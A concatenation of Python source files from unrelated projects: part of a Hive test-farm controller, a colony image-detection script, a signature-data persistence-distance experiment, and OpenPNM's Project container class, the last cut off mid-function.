return ' ; '.join(cmd)
command = segment_other()
other_set.cd(host_code_path)
# See comment about quiet option in run_tests.
other_set.run(command, quiet = True, warn_only = True)
def generate_report(one_file_report = False):
# Uses `Report.py` to create a HTML report.
print('\n-- Generating a test report\n')
local.run('cp "' + master_base_path + '/templogs/* " "'+ report_path + '/logs/" ', warn_only = True)
# Call format to remove '{{' and '}}'.
path = os.path.expandvars(report_path.format())
CmdArgs = collections.namedtuple('CmdArgs', ['one_file', 'log_dir', 'report_dir'])
args = CmdArgs(
one_file = one_file_report,
log_dir = '{0}/logs'.format(path),
report_dir = path
)
Report.make_report(args)
print('\n-- Test report has been generated and is available here:')
print('-- "{0}/report.html"'.format(path))
print()
def stop_tests():
# Brutally stops tests on all hosts, something more subtle would be nice and
# would allow the same user to run this script multiple times
# simultaneously.
print('\n-- Stopping tests on all hosts\n')
remote_set.run('killall -9 java', warn_only = True)
def remove_code():
# Running this only on one connection per host so there are no conflicts
# between several `rm` calls. This removes all repositories, it would have
# to be changed if we were to allow multiple simultaneous runs of this
# script.
print('\n-- Removing Hive code from all hosts\n')
# We could remove only `host_code_path`, but then we would have abandoned
# directories after lowering number of processes running on one host.
cmd = 'rm -rf "' + host_base_path + '"'
cmd = 'if [[ `echo "{host}" | grep -q -- "-0$"; echo "$?"` -eq "0" ]]; then ' + \
cmd + '; fi'
remote_set.run(cmd)
def overwrite_results():
# Copy generated `.q.out` files to master repo.
local.cd(code_path)
expanded_path = local.run('pwd', abandon_output = False)
print('\n-- Copying generated `.q.out` files to master repository: ' +
expanded_path)
for name in ['clientpositive', 'clientnegative']:
local.cd(report_path + '/out/' + name)
# Don't panic if no files are found.
local.run('cp * "' + code_path + '/ql/src/test/results/' + name + '"',
warn_only = True)
def save_svn_info():
if args.svn_info:
local.cd(master_base_path + '/trunk')
local.run('git show --summary > "{0}"'.format(report_path + '/svn-info'))
def save_patch():
if args.save_patch:
local.cd(code_path)
local.run('git add --all')
local.run('git diff --no-prefix HEAD > "{0}"'.format(report_path + '/patch'))
# -- Tasks that can be called from command line start here.
def cmd_prepare(patches = [], revision = None):
get_ant()
get_arc()
if (args.copylocal):
copy_local_hive()
else :
get_clean_hive()
patch_hive(patches, revision)
build_hive()
propagate_hive()
prepare_tests()
def cmd_run_tests(one_file_report = False):
prepare_for_reports()
save_svn_info()
save_patch()
t = Thread(target = run_other_tests)
t.start()
run_tests()
t.join()
if args.overwrite:
overwrite_results()
generate_report(one_file_report)
def cmd_test(patches = [], revision = None, one_file_report = False):
cmd_prepare(patches, revision)
if args.singlehost==False:
local.cd(master_base_path + '/trunk')
local.run('chmod -R 777 *');
local.run('rm -rf "' + master_base_path + '/templogs/"')
local.run('mkdir -p "' + master_base_path + '/templogs/"')
tests = ['TestRemoteHiveMetaStore','TestEmbeddedHiveMetaStore','TestSetUGIOnBothClientServer','TestSetUGIOnOnlyClient','TestSetUGIOnOnlyServer']
for test in tests:
local.run('sudo -u root ant -Divy.default.ivy.user.dir={0} '.format(ivy_path) + ' -Dtestcase=' + test + ' test')
local.run('cp "`find . -name "TEST-*.xml"`" "' + master_base_path + '/templogs/"')
cmd_run_tests(one_file_report)
def cmd_stop():
stop_tests()
def cmd_remove():
remove_code()
parser = argparse.ArgumentParser(description =
'Hive test farm controller.')
parser.add_argument('--config', dest = 'config',
help = 'Path to configuration file')
parser.add_argument('--prepare', action = 'store_true', dest = 'prepare',
help = 'Builds Hive and propagates it to all test machines')
parser.add_argument('--run-tests', action = 'store_true', dest = 'run_tests',
help = 'Runs tests on all test machines')
parser.add_argument('--test', action = 'store_true', dest = 'test',
help = 'Same as running `prepare` and then `run-tests`')
parser.add_argument('--report-name', dest = 'report_name',
help = 'Store report and logs directory called `REPORT_NAME`')
parser.add_argument('--stop', action = 'store_true', dest = 'stop',
help = 'Kill misbehaving tests on all machines')
parser.add_argument('--remove', action = 'store_true', dest = 'remove',
help = 'Remove Hive trunk copies from test machines')
parser.add_argument('--revision', dest = 'revision',
help = 'Differential revision to test')
parser.add_argument('--patch', dest = 'patch', nargs = '*',
help = 'Patches from local file system to test')
parser.add_argument('--one-file-report', dest = 'one_file_report',
action = 'store_true',
help = 'Generate one (huge) report file instead of multiple small ones')
parser.add_argument('--overwrite', dest = 'overwrite', action = 'store_true',
help = 'Overwrite result files in master repo')
parser.add_argument('--copylocal', dest = 'copylocal', action = 'store_true',
help = 'Copy local repo instead of using git clone and git hub')
parser.add_argument('--singlehost', dest = 'singlehost', action = 'store_true',
help = 'Only run the test on single host, It is the users '
'responsibility to make sure that the conf. file does not '
'contain multiple hosts. '
'The script is not doing any validation. When --singlehost is set '
'the script should not be run using sudo.')
parser.add_argument('--very-clean', action = 'store_true', dest = 'very_clean',
help = 'Build hive with `very-clean` option')
parser.add_argument('--svn-info', dest = 'svn_info', action = 'store_true',
help = 'Save result of `svn info` into ${report_path}/svn-info')
parser.add_argument('--save-patch', dest = 'save_patch', action = 'store_true',
help = 'Save applied patch into ${report_path}/patch')
parser.add_argument('--http-proxy', dest = 'http_proxy',
help = 'Proxy host')
parser.add_argument('--http-proxy-port', dest = 'http_proxy_port',
help = 'Proxy port')
args = parser.parse_args()
read_conf(args.config)
if args.report_name:
report_path = '/'.join(report_path.split('/')[:-1] + [args.report_name])
if args.prepare:
cmd_prepare(args.patch, args.revision)
elif args.run_tests:
cmd_run_tests(args.one_file_report)
elif args.test:
cmd_test(args.patch, args.revision, args.one_file_report)
elif args.stop:
cmd_stop()
elif args.remove:
cmd_remove()
else:
parser.print_help()
|
01.colony_detection.py
|
#!/usr/bin/env python
import imaging_picking_function as ipf
import time
import os
import sys
import threading
import argparse
def main():
parser = argparse.ArgumentParser(description = "Program of colony contour detection and segmentation. See details in https://github.com/hym0405/CAMII")
parser.add_argument("-c", "--config", type = str,
help="Configure file of parameters for general colony segmentation and filtering")
parser.add_argument("-i", "--input", type = str,
help="Input folder containing raw images of plates, both trans-illuminated and epi-illuminated. A file named \"image_processed.txt\" will be written to the folder after processing")
parser.add_argument("-o", "--output", type = str,
help="Output folder. The folder will be created if not exists")
args = parser.parse_args()
configure_path = args.config
input_dir = args.input
output_dir = args.output
configure_pool = ipf.readConfigureFile(configure_path)
ipf.modifyOSconfigure(configure_pool)
total_image, image_label_list, image_trans_list, image_epi_list = ipf.readFileList(input_dir)
globalOutput = ipf.globalOutputObject(total_image)
threadPool_fun0 = []
for i in range(total_image):
tmpThread = threading.Thread(target = ipf.multi_fun0_detectColonySingleImage, args = (image_trans_list[i], image_epi_list[i], image_label_list[i], configure_pool, globalOutput, i))
threadPool_fun0.append(tmpThread)
for i in range(total_image):
threadPool_fun0[i].start()
for i in range(total_image):
threadPool_fun0[i].join()
for i in range(total_image):
tmpFlag = ipf.fun1_runPlateQualityControl(globalOutput.image_trans_corrected[i], globalOutput.image_epi_corrected[i], globalOutput.all_contours[i],
globalOutput.all_metadata[i], globalOutput.image_label[i], configure_pool)
globalOutput.plateQC_flag[i] = tmpFlag
f = open(input_dir + "/image_processed.txt", "a")
for e in image_label_list:
f.writelines([e + os.linesep])
f.close()
ipf.modifyOutputObject_colonyDetection(globalOutput, total_image, configure_pool)
if not os.path.isdir(output_dir):
os.system("mkdir -p " + output_dir)
ipf.saveOutputs_colonyDetection(globalOutput, total_image, configure_pool, output_dir)
if __name__ == "__main__":
main()
|
exp_signatures.py
|
import os
import numpy as np
import random as rand
import pylab as py
import matplotlib.pyplot as plt
import scipy.interpolate
import gudhi as gd
import ot
from matplotlib import cm
from lib import helper as hp
from lib.tda import sim_homology
from scipy.interpolate import Rbf, interp1d, interp2d
from typing import List, Set, Dict, Tuple, Optional
from multiprocessing import Process
from scipy.spatial.distance import *
from scipy.stats import *
def top_nat_neighbors(
path: str = "",
array: np.ndarray = np.empty(1),
columns: int = 88
) -> np.ndarray:
"""
Nearest neighbor interpolation.
Returns the original data with augmented nearest neighbors.
:param path: Path to the desired CSV-file.
:param column: Columns to be processed, beginning from the first.
:return:
"""
try:
if len(path) > 0:
data = hp.read_data(path, columns)
else:
data = array
except ValueError:
print("Oops! That was no valid number. Try again ...")
x, y = np.empty(0), np.empty(0)
for i in data:
if np.isfinite(i[0]) and np.isfinite(i[1]):
x = np.append(x, i[0])
y = np.append(y, i[1])
xx = np.linspace(np.min(x), np.max(x), len(x))
f = interp1d(x, y, kind="nearest")
new_data = []
for i in range(0, len(xx)):
new_data.append([xx[i], f(xx[i])])
new_data.append([x[i], y[i]])
return np.array(new_data)
def proc_signatures(dir: str, delimiter: str = ",", iterations: int = 5):
"""
Processes the experiment for the signature dataset.
Insert the directory to the MOBISID dataset: https://ms.sapientia.ro/~manyi/mobisig.html.
:param dir: Path to the directory.
:param delimiter: Delimiter used to save the csv file.
:proc: Directory.
"""
subdirectories = os.listdir(dir)
for user_folder in subdirectories:
if "USER" in user_folder:
path = os.path.abspath(dir + "/" + user_folder)
filepaths = os.listdir(path)
for file in filepaths:
temp_data = top_nat_neighbors(
path=dir + "/" + user_folder + "/" + file, columns=2
)
for j in range(0, iterations):
temp_data = top_nat_neighbors(array=temp_data, columns=2)
np.savetxt(
dir
+ "/"
+ "natneighbor"
+ "/"
+ user_folder
+ "/"
+ "it_"
+ str(j)
+ "_"
+ file,
temp_data,
delimiter=delimiter,
)
def create_persistence_distance_file(
orig_path: str,
interpol_path: str,
savefile: bool = True,
distance_type: ["wasserstein", "bottleneck"] = "wasserstein",
filtration: ["alpha", "rips", "witness"] = "rips",
amount_of_files: int = 100
) -> np.ndarray:
"""
Creates from two directories with corresponding named CSV-files a bottleneck-distance comparison.
This code relies on the naming of the directories.
The structure should be: MOBISIG/USERX/file.csv and MOBISIG_natneighbor/USERX/file.csv for a good naming of the .csv rows.
:param orig_path: Path to the original MOBISIG-files.
:param interpol_path: Path tot the interpolated MOBISIG-files.
:param savefile: Whether to save the bottleneck distances into a file or not (npy-format).
:param amount_of_files: Amount of files to be processed.
:return: np.ndarray with bottleneck distances.
"""
def diff(first, second):
"""
Computes the difference of two list objects.
:param first: First list.
:param second: Second list.
:return: List difference.
"""
second = set(second)
return [item for item in first if item not in second]
original_data, interpolated_data, files_to_ignore = [], [], []
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
files_to_ignore.append(os.path.join(dirpath, filename))
break
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
original_data.append(os.path.join(dirpath, filename))
for dirpath, dirnames, filenames in os.walk(interpol_path):
for filename in filenames:
interpolated_data.append(os.path.join(dirpath, filename))
original_data = diff(original_data, files_to_ignore)
interpolated_data = diff(interpolated_data, files_to_ignore)
for i in original_data:
matching = [s for s in interpolated_data if i[20:] in s]
matching.sort()
for j in matching:
distance = sim_homology.persistence_distance(i, j, filtration=filtration, type=distance_type)
with open("results/" + filtration + "_" + distance_type + ".csv", "a") as fd:
fd.write(
i[20 : len(i) - 4]
+ ","
+ j[32 : len(j) - 4]
+ ","
+ str(distance)
+ "\n"
)
print(
"File with name "
+ j
+ " has been compared to "
+ i
+ ". The " + distance_type + "distance is "
+ str(distance)
+ "."
)
def compute_mean_distance(path1, path2):
def diff(first, second):
"""
Computes the difference of two list objects.
:param first: First list.
:param second: Second list.
:return: List difference.
"""
second = set(second)
return [item for item in first if item not in second]
original_data, interpolated_data, files_to_ignore = [], [], []
for dirpath, dirnames, filenames in os.walk(path1):
for filename in filenames:
files_to_ignore.append(os.path.join(dirpath, filename))
break
for dirpath, dirnames, filenames in os.walk(path1):
for filename in filenames:
original_data.append(os.path.join(dirpath, filename))
for dirpath, dirnames, filenames in os.walk(path2):
for filename in filenames:
interpolated_data.append(os.path.join(dirpath, filename))
original_data = diff(original_data, files_to_ignore)
interpolated_data = diff(interpolated_data, files_to_ignore)
for i in range(0, len(original_data)):
for j in range(0, len(original_data)):
data1 = np.genfromtxt(original_data[i], delimiter=",")
data2 = np.genfromtxt(interpolated_data[j], delimiter=",")
nans1 = np.argwhere(np.isnan(data1))
nans2 = np.argwhere(np.isnan(data2))
for a in nans1:
data1 = np.delete(data1, nans1)
for b in nans2:
data2 = np.delete(data2, nans2)
data1 = data1.flatten()
data2 = data2.flatten()
mean1 = np.mean(data1)
mean2 = np.mean(data2)
std1 = np.std(data1)
std2 = np.std(data2)
varia1 = variation(data1)
varia2 = variation(data2)
w1 = wasserstein_distance(data1, data2)
with open("results/measurement_it.csv", "a") as fd:
fd.write(
original_data[i][20 : len(original_data[i]) - 4]
+ ","
+ interpolated_data[j][32 : len(interpolated_data[j]) - 4]
+ ","
+ str(mean1)
+ ","
+ str(mean2)
+ ","
+ str(std1)
+ ","
+ str(std2)
+ ","
+ str(varia1)
+ ","
+ str(varia2)
+ ","
+ str(w1)
+ "\n"
)
def run_in_parallel(*fns):
"""
Runs several functions in parallel.
:param fns: Several functions.
:return: A nice message.
"""
proc = []
for fn in fns:
p = Process(target=fn)
p.start()
proc.append(p)
for p in proc:
p.join()
return print("Processing finished!")
########################################################################################################################
""" RUN THE DISTANCES
run_in_parallel(
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", distance_type="wasserstein"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", distance_type="wasserstein"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", distance_type="wasserstein"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", distance_type="bottleneck"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", distance_type="bottleneck"),
create_persistence_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", distance_type="bottleneck")
)
"""
########################################################################################################################
|
Project.py
|
import time
import uuid
import openpnm
import numpy as np
from copy import deepcopy
from openpnm.utils import SettingsDict, HealthDict, Workspace, logging
from .Grid import Tableist
logger = logging.getLogger(__name__)
ws = Workspace()
class Project(list):
r"""
This class provides a container for all OpenPNM objects in a given
simulation.
A simulation is defined as a Network and all of it's associated objects.
When instantiating a Network, a Project can be passed as an argument, but
if not given one is created. When instantiating any other object either
a Network or a Project can be supplied. In the former case, the
Network's Project is retrieved and used. The end result is that all
objects are stored in a specific Project.
The Project to which any object belongs can be retrieved with
``obj.project``. Conversely, printing a Project displays a list of all
objects it contains.
Moreover, all Projects are registered with the Workspace. Since there can
be only instance of the Workspace it is possible to view all open Projects
by printing the Workspace.
See Also
--------
Workspace
"""
def __init__(self, *args, **kwargs):
name = kwargs.pop('name', None)
super().__init__(*args, **kwargs)
self.settings = SettingsDict()
ws[name] = self # Register self with workspace
self.settings['_uuid'] = str(uuid.uuid4())
def extend(self, obj):
r"""
This function is used to add objects to the project. Arguments can
be single OpenPNM objects, an OpenPNM project list, or a plain list of
OpenPNM objects. Note that if an object has the same name as one
already existing on the project, the it will be renamed automatically.
"""
if not isinstance(obj, list):
obj = [obj]
for item in obj:
if hasattr(item, '_mro'):
if 'GenericNetwork' in item._mro():
if self.network:
raise Exception('Project already has a network')
# Must use append since extend breaks the dicts up into
# separate objects, while append keeps it as a single object.
if item in self:
raise Exception('Supplied object already part of project')
if item.name in self.names:
item.name = self._generate_name(item)
super().append(item)
else:
raise Exception('Only OpenPNM objects can be added')
def append(self, obj):
r"""
The Project (a list) must be kept as a flat list, so the append
function, which can normally be used to insert a list into a list, is
overloaded to basically prevent the normal append operation and simply
calls ``extend``.
"""
self.extend(obj)
def remove(self, obj):
r"""
The given object is removed from the project
This removes the object, along with all it's labels in associated
objects, but does NOT remove the associated objects.
See Also
-------
purge_object
"""
self.purge_object(obj, deep=False)
def pop(self, index):
r"""
The object at the given index is removed from the list and returned.
Notes
-----
This method uses ``purge_object`` to perform the actual removal of the
object. It is reommended to just use that directly instead.
See Also
--------
purge_object
"""
obj = self[index]
self.purge_object(obj, deep=False)
return obj
def insert(self, index, obj):
r"""
Inserts the supplied object at the specified index in the Project list
Notes
-----
The order of the objects in an OpenPNM Project lists do not matter, so
it is recommended to just use ``append`` instead.
See Also
--------
append
extend
"""
self.extend(obj)
def clear(self, objtype=[]):
r"""
Clears objects from the project entirely or selectively, depdening on
the received arguments.
Parameters
----------
objtype : list of strings
A list containing the object type(s) to be removed. If no types
are specified, then all objects are removed. To clear only objects
of a specific type, use *'network'*, *'geometry'*, *'phase'*,
*'physics'*, or *'algorithm'*. It's also possible to use
abbreviations, like *'geom'*.
"""
if len(objtype) == 0:
super().clear()
else:
names = [obj.name for obj in self]
for name in names:
try:
obj = self[name]
for t in objtype:
if obj._isa(t):
self.purge_object(obj)
except KeyError:
pass
def copy(self, name=None):
r"""
Creates a deep copy of the current project
A deep copy means that new, unique versions of all the objects are
created but with identical data and properties.
Parameters
----------
name : string
The name to give to the new project. If not supplied, a name
is automatically generated.
Returns
-------
proj : list
A new Project object containing copies of all objects
Notes
-----
Because they are new objects, they are given a new uuid
(``obj.settings['_uuid']``), but the uuid of the original object is
also stored (``obj.settings['_uuid_old']``) for reference.
"""
if name is None:
name = ws._gen_name()
proj = deepcopy(self)
for item in proj:
item.settings['_uuid'] = str(uuid.uuid4())
self.settings['_uuid'] = str(uuid.uuid4())
ws[name] = proj
return proj
@property
def workspace(self):
return ws
def _set_name(self, name):
if name is None:
name = ws._gen_name()
ws[name] = self
def _get_name(self):
for key in ws.keys():
if ws[key] is self:
return key
name = property(fget=_get_name, fset=_set_name)
def __getitem__(self, key):
if isinstance(key, str):
obj = None
for item in self:
if item.name == key:
obj = item
if obj is None:
raise KeyError(key)
else:
obj = super().__getitem__(key)
return obj
def find_phase(self, obj):
r"""
Find the Phase associated with a given object.
Parameters
----------
obj : OpenPNM Object
Can either be a Physics or Algorithm object
Returns
-------
phase : OpenPNM Phase object
Raises
------
If no Phase object can be found, then an Exception is raised.
"""
# If received phase, just return self
if obj._isa('phase'):
return obj
# If phase happens to be in settings (i.e. algorithm), look it up
if 'phase' in obj.settings.keys():
return self.phases()[obj.settings['phase']]
# Otherwise find it using bottom-up approach (i.e. look in phase keys)
for item in self.phases().values():
if ('pore.' + obj.name in item) or ('throat.' + obj.name in item):
return item
# If all else fails, throw an exception
raise Exception('Cannot find a phase associated with '+obj.name)
def find_geometry(self, physics):
r"""
Find the Geometry associated with a given Physics
Parameters
----------
physics : OpenPNM Physics Object
Must be a Physics object
Returns
-------
geom : OpenPNM Geometry object
Raises
------
If no Geometry object can be found, then an Exception is raised.
"""
# If geometry happens to be in settings, look it up directly
if 'geometry' in physics.settings.keys():
geom = self.geometries()[physics.settings['geometry']]
return geom
# Otherwise, use the bottom-up approach
for geo in self.geometries().values():
if physics in self.find_physics(geometry=geo):
return geo
# If all else fails, throw an exception
raise Exception('Cannot find a geometry associated with '+physics.name)
def find_physics(self, geometry=None, phase=None):
r"""
Find the Physics object(s) associated with a given Geometry, Phase,
or combination.
Parameters
----------
geometry : OpenPNM Geometry Object
The Geometry object for which the Physics object(s) are sought
phase : OpenPNM Phase Object
The Phase object for which the Physics object(s) are sought
Returns
-------
physics : list
A list containing the Physics object(s). If only a ``geometry`` is
specified the the Physics for all Phases is returned. If only a
``phase`` is specified, then the Physics for all Geometries is
returned. If both ``geometry`` and ``phase`` is specified then
the list only contains a single Physics. If no Physics is found,
the the list will be empty. See the Notes section for more
information.
See Also
--------
grid
Notes
-----
The Project has a ``grid`` attribute that shows the associations of
all objects. If each Geometry represents a row and each Phase is a
column, then each row/col intersection represents a Physics. This
method finds the Physics' at each intersection
"""
if geometry is not None and phase is not None:
physics = self.find_physics(geometry=geometry)
phases = list(self.phases().values())
return physics[phases.index(phase)]
if geometry is not None and phase is None:
result = []
geoPs = self.network[f'pore.{geometry.name}']
geoTs = self.network[f'throat.{geometry.name}']
for _phase in self.phases().values():
physics = self.find_physics(phase=_phase)
for phys in physics:
Ps = _phase.map_pores(pores=phys.Ps, origin=phys)
physPs = _phase.tomask(pores=Ps)
Ts = _phase.map_throats(throats=phys.Ts, origin=phys)
physTs = _phase.tomask(throats=Ts)
if np.all(geoPs == physPs) and np.all(geoTs == physTs):
result.append(phys)
return result
if geometry is None and phase is not None:
names = set(self.physics().keys())
keys = set([item.split('.')[-1] for item in phase.keys()])
hits = names.intersection(keys)
return [self.physics().get(i, None) for i in hits]
return list(self.physics().values())
def find_full_domain(self, obj):
r"""
Find the full domain object associated with a given object.
For geometry the network is found, for physics the phase is found and
for all other objects which are defined for for the full domain,
themselves are found.
Parameters
----------
obj : OpenPNM Object
Can be any object
Returns
-------
obj : An OpenPNM object
"""
if 'Subdomain' not in obj._mro():
# Network, Phase, Algorithm
return obj
if obj._isa() == 'geometry':
# Geometry
return self.network
# Physics
return self.find_phase(obj)
def _validate_name(self, name):
if name in self.names:
raise Exception('Another object is already named '+name)
for item in self:
for key in item.keys():
if key.split('.')[1] == name:
raise Exception('A property/label is already named '+name)
def _generate_name(self, obj):
prefix = obj.settings['prefix']
num = len(self._get_objects_by_type(obj._isa())) + 1
name = prefix + '_' + str(num).zfill(2)
try:
self._validate_name(name)
except Exception:
name = prefix + '_' + str(np.random.randint(100, 999))
return name
@property
def names(self):
names = [i.name for i in self]
return names
def purge_object(self, obj, deep=False):
r"""
Remove an object from the Project. This removes all references to
the object from all other objects (i.e. removes labels)
Parameters
----------
obj : OpenPNM Object or list of objects
The object(s) to purge
deep : boolean
A flag that indicates whether to remove associated objects.
If ``True``, then removing a Geometry or Phase also removes
the associated Physics objects. If ``False`` (default) then
only the given object is removed, along with its labels in all
associated objects. Removing a Physics always keeps associated
Geometry and Phases since they might also be associated with other
Physics objects.
Raises
------
An Exception is raised if the object is a Network.
Notes
-----
For a clearer picture of this logic, type ``print(project.grid)`` at
the console. A deep purge of a Geometry is like removing a row, while
a Phase is like removing a column.
"""
if isinstance(obj, list):
for item in obj:
self.purge_object(obj=item, deep=deep)
return
if obj._isa() in ['physics', 'algorithm']:
self._purge(obj)
if obj._isa() == 'geometry':
if deep:
physics = self.find_physics(geometry=obj)
for phys in physics:
self._purge(self.physics()[phys.name])
self._purge(obj)
if obj._isa() == 'phase':
if deep:
physics = self.find_physics(phase=obj)
for phys in physics:
self._purge(self.physics()[phys.name])
self._purge(obj)
if obj._isa() == 'network':
raise Exception('Cannot purge a network, just make a new project')
def _purge(self, obj):
for item in self:
for key in list(item.keys()):
if key.split('.')[-1] == obj.name:
del item[key]
super().remove(obj)
def save_object(self, obj):
r"""
Saves the given object or list of objects to a pickle file
Parameters
----------
obj : OpenPNM object or list of objects
The objects to be saved. Depending on the object type, the file
extension will be one of 'net', 'geo', 'phase', 'phys' or 'alg'.
"""
from openpnm.io import Pickle
Pickle.save_object_to_file(objs=obj)
def load_object(self, filename):
r"""
Loads a single object from a pickle file
Parameters
----------
filename : string or path object
The name of the file containing the saved object. Can include
an absolute or relative path as well. If only a filename is
given it will be saved in the current working directory. The
object type is inferred from
"""
from openpnm.io import Pickle
Pickle.load_object_from_file(filename=filename, project=self)
def save_project(self, filename=None):
r"""
Save the current project to a ``pnm`` file.
Parameters
----------
filename : string or path object
The name of the file. Can include an absolute or relative path
as well. If only a filename is given it will be saved in the
current working directory.
"""
ws.save_project(project=self, filename=filename)
def _new_object(self, objtype, name=None):
r"""
"""
if objtype.startswith('net'):
obj = openpnm.network.GenericNetwork(project=self, name=name)
elif objtype.startswith('geo'):
obj = openpnm.geometry.GenericGeometry(project=self, name=name,
pores=[], throats=[])
elif objtype.startswith('pha'):
obj = openpnm.phases.GenericPhase(project=self, name=name)
elif objtype.startswith('phy'):
obj = openpnm.physics.GenericPhysics(project=self, name=name)
elif objtype.startswith('alg'):
obj = openpnm.algorithms.GenericAlgorithm(project=self, name=name)
else:
obj = openpnm.core.Base(project=self, name=name)
return obj
def export_data(self, phases=[], filename=None, filetype=None):
r"""
Export the pore and throat data from the given object(s) into the
specified file and format.
Parameters
----------
phases : list of OpenPNM Phase Objects
The data on each supplied phase will be added to file
filename : string
The file name to use. If none is supplied then one will be
automatically generated based on the name of the project
containing the supplied Network, with the date and time appended.
filetype : string
Which file format to store the data. If a valid extension is
included in the ``filename``, this is ignored. Option are:
**'vtk'** : (default) The Visualization Toolkit format, used by
various softwares such as Paraview. This actually produces a 'vtp'
file. NOTE: This can be quite slow since all the data is written
to a simple text file. For large data simulations consider
'xdmf'.
**'csv'** : The comma-separated values format, which is easily
openned in any spreadsheet program. The column names represent
the property name, including the type and name of the object to
which they belonged, all separated by the pipe character.
**'xdmf'** : The extensible data markup format, is a very efficient
format for large data sets. This actually results in the creation
of two files, the *xmf* file and an associated *hdf* file. The
*xmf* file contains instructions for looking into the *hdf* file
where the data is stored. Paraview opens the *xmf* format natively,
and is very fast.
**'mat'** : Matlab 'mat-file', which can be openned in Matlab.
Notes
-----
This is a helper function for the actual functions in the ``io``
module. For more control over the format of the output, and more
information about the format refer to ``openpnm.io``.
"""
import builtins
project = self
network = self.network
if filename is None:
filename = project.name + '_' + time.strftime('%Y%b%d_%H%M%p')
if filetype is None:
if '.' in filename:
filetype = filename.split('.')[-1]
# Convert file type to io class name
temp = {"hdf": "hdf5", "xmf": "xdmf", "vtp": "vtk", "pkl": "pickle"}
if filetype in temp.keys():
filetype = temp[filetype]
else:
raise Exception('File type not given')
# Fetch correct io class, using case insensitive look-up
def igetattr(obj, attr):
for a in dir(obj):
if a.lower() == attr.lower():
return orig_getattr(obj, a)
orig_getattr = builtins.getattr
fmt = igetattr(openpnm.io, filetype)
fmt.export_data(network=network, phases=phases, filename=filename)
@property
def network(self):
net = list(self._get_objects_by_type('network').values())
net = net[0] if len(net) > 0 else None
return net
def geometries(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('geometry')
def phases(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('phase')
def physics(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('physics')
def algorithms(self, name=None):
if name:
return self._get_object_by_name(name)
return self._get_objects_by_type('algorithm')
def _get_object_by_name(self, name):
for item in self:
if item.name == name:
return item
raise Exception('An object named ' + name + ' was not found')
def _get_objects_by_type(self, objtype):
return {item.name: item for item in self if item._isa(objtype)}
def __str__(self):
s = []
hr = '―'*78
s.append(hr)
s.append(' {0:<15} '.format('Object Name')
+ '{0:<65}'.format('Object ID'))
s.append(hr)
for item in self:
s.append(' {0:<15} '.format(item.name)
+ '{0:<65}'.format(item.__repr__()))
s.append(hr)
return '\n'.join(s)
def __repr__(self):
return self.__str__()
def check_geometry_health(self):
r"""
Perform a check to find pores with overlapping or undefined Geometries
Returns
-------
A HealthDict
"""
health = HealthDict()
health['overlapping_pores'] = []
health['undefined_pores'] = []
health['overlapping_throats'] = []
health['undefined_throats'] = []
geoms = self.geometries().keys()
if len(geoms) > 0:
net = self.network
Ptemp = np.zeros((net.Np,))
Ttemp = np.zeros((net.Nt,))
for item in geoms:
Pind = net['pore.'+item]
Tind = net['throat.'+item]
Ptemp[Pind] = Ptemp[Pind] + 1
Ttemp[Tind] = Ttemp[Tind] + 1
health['overlapping_pores'] = np.where(Ptemp > 1)[0].tolist()
health['undefined_pores'] = np.where(Ptemp == 0)[0].tolist()
health['overlapping_throats'] = np.where(Ttemp > 1)[0].tolist()
health['undefined_throats'] = np.where(Ttemp == 0)[0].tolist()
else:
health['undefined_pores'] = self.network.Ps
health['undefined_throats'] = self.network.Ts
return health
def check_physics_health(self, phase):
r"""
Perform a check to find pores which have overlapping or missing Physics
Parameters
----------
phase : OpenPNM Phase object
The Phase whose Physics should be checked
Returns
-------
A HealthDict
"""
health = HealthDict()
health['overlapping_pores'] = []
health['undefined_pores'] = []
health['overlapping_throats'] = []
health['undefined_throats'] = []
geoms = self.geometries().keys()
if len(geoms) > 0:
phys = self.find_physics(phase=phase)
if len(phys) == 0:
raise Exception(str(len(geoms))+' geometries were found, but'
+ ' no physics')
if None in phys:
raise Exception('Undefined physics found, check the grid')
Ptemp = np.zeros((phase.Np,))
Ttemp = np.zeros((phase.Nt,))
for item in phys:
Pind = phase['pore.'+item.name]
Tind = phase['throat.'+item.name]
Ptemp[Pind] = Ptemp[Pind] + 1
Ttemp[Tind] = Ttemp[Tind] + 1
health['overlapping_pores'] = np.where(Ptemp > 1)[0].tolist()
health['undefined_pores'] = np.where(Ptemp == 0)[0].tolist()
health['overlapping_throats'] = np.where(Ttemp > 1)[0].tolist()
health['undefined_throats'] = np.where(Ttemp == 0)[0].tolist()
return health
def check_data_health(self, obj):
r"""
Check the health of pore and throat data arrays.
Parameters
----------
obj : OpenPNM object
A handle of the object to be checked
Returns
-------
health : dict
Returns a HealthDict object which a basic dictionary with an added
``health`` attribute that is True is all entries in the dict are
deemed healthy (empty lists), or False otherwise.
"""
health = HealthDict()
for item in obj.props():
health[item] = []
if obj[item].dtype == 'O':
health[item] = 'No checks on object'
elif np.sum(np.isnan(obj[item])) > 0:
health[item] = 'Has NaNs'
elif np.shape(obj[item])[0] != obj._count(item.split('.')[0]):
health[item] = 'Wrong Length'
return health
def check_network_health(self):
r"""
This method check the network topological health by checking for:
(1) Isolated pores
(2) Islands or isolated clusters of pores
(3) Duplicate throats
(4) Bidirectional throats (ie. symmetrical adjacency matrix)
(5) Headless throats
Returns
-------
health : dict
A dictionary containing the offending pores or throat numbers under
each named key.
Notes
-----
It also returns a list of which pores and throats should be trimmed
from the network to restore health. This list is a suggestion only,
and is based on keeping the largest cluster and trimming the others.
Notes
-----
- Does not yet check for duplicate pores
- Does not yet suggest which throats to remove
- This is just a 'check' and does not 'fix' the problems it finds
"""
import scipy.sparse.csgraph as csg
import scipy.sparse as sprs
health = HealthDict()
health['disconnected_clusters'] = []
health['isolated_pores'] = []
health['trim_pores'] = []
health['duplicate_throats'] = []
health['bidirectional_throats'] = []
health['headless_throats'] = []
health['looped_throats'] = []
net = self.network
